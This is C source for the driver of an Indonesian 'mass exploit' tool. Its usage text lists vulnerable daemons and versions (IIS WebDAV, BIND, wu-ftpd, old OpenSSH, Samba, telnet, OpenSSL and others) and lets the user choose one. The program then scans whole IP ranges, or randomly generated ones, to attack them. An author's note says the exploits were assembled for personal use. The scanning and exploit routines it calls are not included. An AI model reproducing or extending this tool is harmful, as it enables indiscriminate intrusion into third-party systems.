#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

void usage(char *heh)
{
    printf("
    VULNERABLE 80:
    Microsoft-IIS/5.0 
    Webdav/ntdll.dll
    
    VULNERABLE 515:
    Red Hat 7.0 Guiness LPRng from RPM
    Solaris 8 SPARC

    VULNERABLE 53:
    Named 8.2, 8.2.1, 8.2.2, 8.2.2-P3, 8.2.2-P5, 8.2.2-P7, 4.9.6-REL

    VULNERABLE 21:
    Wu-FTPD prior to 2.6.1(anonymous login)
    ProFTPD prior to 1.2.0pre5(anon login)
    BeroFTPD 1.3.4(1)
    FreeBSD FTP Version 6.00LS (anon login)
    OpenBSD FTP Version 6.4/6.5 (anon login)

    VULNERABLE 22:
    Linux :
    SSH-1.5-1.2.25 to SSH-1.5-1.2.31
    SSH-1.5-OpenSSH_1.2 to SSH-1.5-OpenSSH_1.2.3
    SSH-1.99-OpenSSH_2.1.1 and about 30 no bull shits targets exploitable
    OpenBSD :
    SSH-1.99-OpenSSH_2.9.9 to SSH-1.99-OpenSSH_3.3 and autopatch options
       
    VULNERABLE 111:
    Redhat 6.2, Redhat 6.1, Redhat 6.0
    Irix 6.2 to Irix 6.5
   
    VULNERABLE 139
    Samba Linux, FreeBSD, NetBSD, OpenBSD
  
    VULNERABLE 23:
    Linux:
    RedHat 6.0 to RedHat 7.1, Debian 2.2
    xBSD :
    FreeBSD 3.1, 4.0-REL, 4.2-REL, 4.3-BETA, 4.3-STABLE, 4.3-RELEASE
    NetBSD 1.5, BSDI BSD/OS 4.1
    Solaris/SunOS :
    2.6, 2.7, 2.8 SPARC

    VULNERABLE 113:
    Slackware 7.1, Slackware 8.1, RedHat 6.2, Debian 3.0

    VULNERABLE 443
    Linux Red-Hat 7.3 Mandrake 8.2 Debian 3.0 Suse 8.0
    Slackware 8.1 FreeBSD 4.4 FreeBSD 4.5 FreeBSD 4.6 R
             

    PERNYATAAN :
    ===========
    SAYA TIDAK MEMBUAT MASS EXPLOIT INI, SAYA HANYA MERAKIT
    DAN MENGGUNAKANNYA UNTUK KEPENTINGAN SAYA SENDIRI
    IBARAT BOM, SAYA TIDAK BISA MEMBUAT C-4 DAN ATAU RDX
    SAYA HANYA MERAKIT, BUKAN AUTHOR, QE3 HE HE HE ...
    SAYA TIDAK MENYINDIR PARA KIDDIES INDONESIA YANG GAMPANG
    MENARUH KATA AUTHOR DI ATAS KARYA KAWAN KITA DARI BARAT 

    rgds
    deGleng 
    #dhegleng

    * Contoh perintah :
    * %s 192.168 -d 9 (Scan samba dimulai dari ip 192.168.0.0)
    * %s 192.168.1 -d 4 (Scan ssh dimulai dari 1p 192.168.1.0)
    * Daftar parameter -d : 
    *   1: bind 
    *	2: lpd 
    *	3: ftpd
    *   4: ssh
    *   5: rpc
    *   6: telnet
    *   7: identd
    *   8: openssl
    *   9: samba
    *  10: webdav
    *  11: pxe
    *  12: wedus
    *  13: sapi
    *  14: kebo
    *  15: Three In One Empuk
    *  16: All in one \n",heh,heh);
    exit (0);
}

int main(int argc, char *argv[])
{
    char	c, ip[16];
    char	*ip2, *nr, *iptemp, *aa, *bb, *cc, *daemon; 
    int		i, target, ipa, ipb, ipc, port, cuk[2]={0,0}; //+
    
    if (argc < 4)
	usage(argv[0]);
    if (strlen(argv[1]) > 15)
      usage(argv[0]);
    
    strcpy(ip, argv[1]);
    ipa = 0;
    ipb = 0;
    ipc = 0;
    nr = ".";
    
    aa = ip;
    ipa = atoi(aa);
    if (ipa < 0 || ipa > 255)
    {	
	usage(argv[0]);
    }					    
    
    if (strstr(aa, nr))
    {
	bb = strstr(aa, nr);
	bb++;
	ipb = atoi(bb);
	if (ipb < 0 || ipb > 255)
	{
	    usage(argv[0]);
	}						
	if (strstr(bb, nr))
	{
	    cc = strstr(bb, nr);
	    cc++;
	    ipc = atoi(cc);
	    if (ipc < 0 || ipc > 255)
	    {
		usage(argv[0]);
	    }
	}
    }
    else
    {	
	if(strstr(ip, "random-"))
	{
	    if(strstr(ip, "random-a"))
	    {
		printf("Generating A Class\n");
		ipa = gen();
	    }
	    else
	    {
		if (strstr(ip, "random-b"))
		{
		    printf("Generating B Class\n");
		    ipa = gen();
		    sleep(1);
		    ipb = gen();
		}
		else
		{
		    if (strstr(ip, "random-c"))
		    {
		        printf("Generating C Class\n");
			ipa = gen();
			sleep(1);
		        ipb = gen();
			sleep(1);
		        ipc = gen();
	    	    }
		    else
		    {
			printf("Invalid Random Class\n");
		    }
		}
	    }
	}
    }

    while ((c = getopt(argc, argv, "t:d:s")) != EOF)
    {
        switch (c)
        {
	    case 'd':
	        if (atoi(optarg) == 0)
		{    
		    printf("Specify a daemon\n");
		    exit(0);
		}
		if (atoi(optarg) > 18)
		{
		    printf("Specify a valid daemon\n");
		    exit(0);
		}    
		target = atoi(optarg);
                    break;
            default:
	        break;
	}
    }
    
    switch (target)
    {
	case 1:
	    port = 53;
	    daemon = "bind";
	    break;
	case 2:
	    port = 515;
	    daemon = "lpd";
	    break;
	case 3:
	    port = 21;
	    daemon = "ftpd";
	    break;
	case 4:
	    port = 22;
	    daemon = "ssh";
	    break;
        case 5:
            port = 111;
            daemon = "rpc.*";
            break;             
        case 6:
            port = 23;
            daemon ="telnet";
            break;
        case 7:
            port = 113;
            daemon ="identd";
            break;
        case 8:
            port = 443;
            daemon ="Open-SSL";
            break;
        case 9:
            port = 139;
            daemon ="samba";
            break;
        case 10:
            port = 80;
            daemon ="webdav";
            break;
        case 11:
            port = 4011;
            daemon ="pxe";
            break;
        case 12:
           port = 21;
           daemon ="wedus";
           break;
        case 13:
           port = 21;
           daemon ="sapi";
           break;
        case 14:
           port = 22;
           daemon ="kebo";
           break;
        case 15:
	   cuk[0] = 1;
	   port = 22;
           daemon ="Three In One Empuk";
           break;
        case 16:
          cuk[1] = 1;
	  port = 22;
          daemon ="All in One Atos";
          break;
	default:
	   port = 22;
	   daemon = "ssh";
	   break;
    }
    printf("Scan mulai dari %d.%d.%d.0\n",ipa,ipb,ipc);
    printf("Target daemon/port : %s/%d\n",daemon,port);
    printf("Sodok terusss, Kontrol + C berhenti cuk ! \n");
    if (cuk[0] != 0)
	scan_c(ipa,port,ipb,ipc);
    if (cuk[1] != 0)
	scan_b(ipa,port,ipb,ipc);
    if ((cuk[0] != 1) || (cuk[1] != 1))
	scan_a(ipa,port,ipb,ipc);
}